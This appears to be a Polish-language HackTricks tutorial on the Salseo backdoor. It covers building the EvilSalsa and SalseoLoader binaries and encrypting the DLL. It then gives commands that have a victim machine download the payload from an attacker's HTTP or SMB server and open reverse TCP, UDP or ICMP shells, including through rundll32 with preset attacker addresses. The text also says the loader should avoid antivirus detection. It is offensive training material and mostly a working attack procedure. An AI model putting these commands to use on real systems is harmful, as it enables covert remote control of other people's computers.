7.6 KiB
Salseo
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Kompilacja binarek
Pobierz kod źródłowy z githuba i skompiluj EvilSalsa oraz SalseoLoader. Będziesz potrzebować zainstalowanego Visual Studio, aby skompilować kod.
Skompiluj te projekty dla architektury komputera z systemem Windows, na którym zamierzasz ich używać (jeśli Windows obsługuje x64, skompiluj je dla tej architektury).
Możesz wybrać architekturę w Visual Studio w lewej zakładce "Build" w "Platform Target".
(**Jeśli nie możesz znaleźć tych opcji, kliknij w "Project Tab" a następnie w "<Nazwa Projektu> Properties")
Następnie zbuduj oba projekty (Build -> Build Solution) (W logach pojawi się ścieżka do pliku wykonywalnego):
Przygotowanie Backdoora
Przede wszystkim będziesz musiał zakodować EvilSalsa.dll. Aby to zrobić, możesz użyć skryptu python encrypterassembly.py lub możesz skompilować projekt EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, teraz masz wszystko, co potrzebne do wykonania całej operacji Salseo: zakodowany EvilDalsa.dll i plik binarny SalseoLoader.
Prześlij plik binarny SalseoLoader.exe na maszynę. Nie powinny być wykrywane przez żadne AV...
Wykonaj backdoora
Uzyskanie odwrotnej powłoki TCP (pobieranie zakodowanego dll przez HTTP)
Pamiętaj, aby uruchomić nc jako nasłuchującego powłokę odwrotną oraz serwer HTTP do serwowania zakodowanego evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Uzyskiwanie odwrotnej powłoki UDP (pobieranie zakodowanej dll przez SMB)
Pamiętaj, aby uruchomić nc jako nasłuchującego powłokę odwrotną oraz serwer SMB, aby udostępnić zakodowaną evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Uzyskiwanie odwrotnego powłoki ICMP (zakodowana dll już wewnątrz ofiary)
Tym razem potrzebujesz specjalnego narzędzia w kliencie, aby odebrać odwrotną powłokę. Pobierz: https://github.com/inquisb/icmpsh
Wyłącz odpowiedzi ICMP:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Wykonaj klienta:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Wewnątrz ofiary, wykonajmy rzecz salseo:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Kompilowanie SalseoLoader jako DLL eksportującego funkcję główną
Otwórz projekt SalseoLoader w Visual Studio.
Dodaj przed funkcją główną: [DllExport]
Zainstaluj DllExport dla tego projektu
Narzędzia --> Menedżer pakietów NuGet --> Zarządzaj pakietami NuGet dla rozwiązania...
Szukaj pakietu DllExport (używając zakładki Przeglądaj), a następnie naciśnij Zainstaluj (i zaakceptuj okno popup)
W folderze projektu pojawiły się pliki: DllExport.bat i DllExport_Configure.bat
Uninstaluj DllExport
Naciśnij Odinstaluj (tak, to dziwne, ale uwierz mi, to konieczne)
Zamknij Visual Studio i uruchom DllExport_configure
Po prostu zamknij Visual Studio
Następnie przejdź do swojego folderu SalseoLoader i uruchom DllExport_Configure.bat
Wybierz x64 (jeśli zamierzasz używać go w środowisku x64, tak było w moim przypadku), wybierz System.Runtime.InteropServices (w Namespace for DllExport) i naciśnij Zastosuj
Otwórz projekt ponownie w Visual Studio
[DllExport] nie powinno być już oznaczone jako błąd
Zbuduj rozwiązanie
Wybierz Typ wyjścia = Biblioteka klas (Projekt --> Właściwości SalseoLoader --> Aplikacja --> Typ wyjścia = Biblioteka klas)
Wybierz platformę x64 (Projekt --> Właściwości SalseoLoader --> Budowanie --> Cel platformy = x64)
Aby zbudować rozwiązanie: Buduj --> Zbuduj rozwiązanie (W konsoli wyjściowej pojawi się ścieżka do nowego DLL)
Przetestuj wygenerowane Dll
Skopiuj i wklej Dll tam, gdzie chcesz go przetestować.
Wykonaj:
rundll32.exe SalseoLoader.dll,main
Jeśli nie pojawi się błąd, prawdopodobnie masz funkcjonalny DLL!!
Uzyskaj powłokę za pomocą DLL
Nie zapomnij użyć serwera HTTP i ustawić nasłuchiwacza nc
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.